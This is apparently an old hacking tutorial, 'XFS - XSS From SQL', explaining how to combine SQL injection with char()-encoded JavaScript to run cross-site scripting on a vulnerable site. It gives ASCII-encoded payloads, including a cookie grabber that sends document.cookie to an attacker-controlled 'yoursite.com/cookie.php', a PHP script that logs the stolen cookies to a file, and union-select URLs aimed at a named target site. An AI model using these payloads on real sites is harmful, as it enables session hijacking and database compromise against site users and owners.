XFS - XSS From SQL

XFS - XSS From SQL

[------------------------------------------------------------------------]

[+] Summary

[1] Presentation

[2] Explanation

[3] Demonstration

[------------------------------------------------------------------------]

[1] --[Presentation]--

XFS is a SQL deviation who lets return javascript code by through of the 

function char().

This function convert an ASCII code to char, this why we'll 

use it to execute javascript code.

The XFS can give you a restricted XSS 

possibility and obviously the SQL vulnerabilty.

So for XFS we need :

- String to ASCII converter

- The function char()

In the next parties you will see the conditions for do it, how it work 

and demonstration.

[2] --[Explanation]--

To use it, you need to convert your string in ASCII 

(Online Converter : http://www.easycalculation.com/ascii-hex.php).

Char() will read the ASCII code and return it, so if you insert 

the ASCII javascript code, char() will return you the 

javascript code and it will be executed BUT when you encode your javascript 

code, this codemustn't have any space, so the XSS is restricted

but you can grab, alert and a lot of other XSS thing.

Example :

If you want convert your javascript code to ASCII, for work, the javascript 

code mustn't to be like it :

<script > alert(document.cookie) </script> <= You need to delete space :

<script>alert(document.cookie)</script> <= Its okay, you can convert it in ASCII

When the code will be convert in ASCII, you will get a thing like it :

46 65 42 12 85 68 ...

But before put it in char(ASCII), we need to replace space by "," like it :

46,65,42,12,85,68 ... <= Its okay for put in char()

[3] --[Demonstration]--

Vuln website :

- http://landfill.elvinbts.org/show_ac...II_CODE),7,8--

Some javascript codes without space :

Alert :

################################

#

#- String : <SCRIPT>alert('xss')</script>

#

#- ASCII : 60 83 67 82 73 80 84 62 97 108 101 114 116 40 39 120 115 115 39 #41 60 

47 115 99 114 105 112 116 62 

#

################################

Cookie Grabber :

################################

#

#- String : 

<SCRIPT>location.href='http://www.yoursite.com/cookie.php?#cookie='

+escape(document.cookie)</SCRIPT>

#

#- ASCII : 60 83 67 82 73 80 84 62 108 111 99 97 116 105 111 

110 46 104 114 101 102 61 39 104 116 116 112 58 47 47 119 

119 119 46 121 111 117 114 115 105 116 101 46 99 111 109 

47 99 111 111 107 105 101 46 112 104 112 63 99 111 111 107

 105 101 61 39 43 101 115 99 97 112 101 40 100 111 99 117 

109 101 110 116 46 99 111 111 107 105 101 41 60 47 83 67 

82 73 80 84 62 

#

################################

Cookie Grabber file :

################################

#

# <?php

#

#

$cookies = $_GET["cookie"];

#

# if($cookies)

# {

#

# $grab = fopen("grab.txt","a");

# fputs($grab, $cookies . "\r\n");

# fclose($grab);

#

# }

#

# ?>

#

################################

So before insert your ASCII in char(), you must replace 

(in the ASCII code) all space by ",".

Example :

################################

# 45 52 86 23 54 ...

# To :

# 45,52,86,23,54 ...

################################

So lets go :

Alert :

http://landfill.elvinbts.org/show_ac...,116,62),7,8--

You can see a textbox is executed with the text : "XSS" => it's the XSS alert